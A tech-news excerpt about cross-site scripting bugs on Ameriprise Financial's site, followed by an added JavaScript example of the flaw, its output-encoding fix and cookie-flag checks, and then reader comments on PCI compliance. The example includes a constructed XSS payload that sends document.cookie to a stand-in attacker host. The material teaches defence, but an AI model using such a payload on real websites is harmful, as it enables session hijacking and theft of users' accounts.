Security bugs crawl all over financial giant’s website

For the past five months, a website for investment services giant Ameriprise Financial contained bugs that allowed even low-level criminals to inject malicious content into official company webpages and steal users' cookies, according to a web security expert. The XSS, or cross-site scripting, flaws made it possible for …
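The mechanics the excerpt alludes to, as an added example that is not code from the article or from the Ameriprise site: a page that echoes a request parameter straight into its markup, the same template with output encoding, a constructed cookie-stealing payload of the kind the article describes, and a check of the Set-Cookie flags that limit what a successful XSS can do with a session cookie. The template, the parameter, the attacker host and the cookie name are all assumptions.

```javascript
// Added example, not from the article or the affected site.
// Template, parameter name, attacker host and cookie name are assumptions.

// Minimal HTML escaping for untrusted text placed inside an element body
// or a double-quoted attribute value.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: the search term from the query string is concatenated
// directly into the page, so markup in it becomes markup in the response.
function renderSearchVulnerable(term) {
  return `<p>Results for: ${term}</p>`;
}

// Hardened: same template, but the untrusted value is encoded first,
// so the browser renders it as text rather than parsing it as HTML.
function renderSearchSafe(term) {
  return `<p>Results for: ${escapeHtml(term)}</p>`;
}

// Constructed payload (hypothetical attacker host): closes the <p>, then
// injects a script that ships document.cookie to a third party.
const payload =
  '</p><script>new Image().src="https://attacker.example/c?"+document.cookie</script>';

// Crude detection: does the rendered HTML contain a raw <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Reports whether a Set-Cookie header value carries the two flags that
// blunt cookie theft: HttpOnly keeps the cookie out of document.cookie,
// Secure keeps it off plaintext HTTP. Attribute names are case-insensitive.
function cookieFlags(setCookieHeader) {
  const attrs = setCookieHeader
    .split(';')
    .slice(1)
    .map((a) => a.trim().toLowerCase());
  return {
    httpOnly: attrs.includes('httponly'),
    secure: attrs.includes('secure'),
  };
}

// Stand-alone demonstration.
console.log(containsScriptTag(renderSearchVulnerable(payload))); // true
console.log(containsScriptTag(renderSearchSafe(payload)));       // false
console.log(cookieFlags('SESSION=abc123; Path=/; HttpOnly; Secure'));
console.log(cookieFlags('SESSION=abc123; Path=/'));
```

Note that HttpOnly only stops the `document.cookie` exfiltration shown here; a script running in the page can still issue requests that carry the cookie automatically, so the encoding fix is the one that removes the bug, and the cookie flags are defence in depth.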


This topic is closed for new posts.
  1. M 2


    Obviously these guys handle credit card details and therefore need to be PCI DSS compliant. This is one of those occasions where the Security Standards Council / card issuers need to use the big stick and impose sanctions (i.e. revoke certification and the resultant fines), as they would for a company that size that has not achieved compliance by their target date.

    To say "I have no idea if someone reported a vulnerability, but I am going to do nothing about how we handle vuln reporting" is totally unacceptable, and quite apart from the failure to comply with Requirement 6.5 (secure development of websites) it is surely also refusing to comply with 12.9 "Implement an incident response plan" or Req 5 "Maintain a vulnerability management program".

    Totally lame. If I had any business with them (which I don't) I would be pulling it and moving to someone else. If the PCI SSC is not going to use the big stick, then the public needs to when companies display this type of attitude, by voting with their feet!



  2. Anonymous Coward

    Oh dear

    "Please to fix this pwntastic code"? I wouldn't be inclined to take them seriously either.

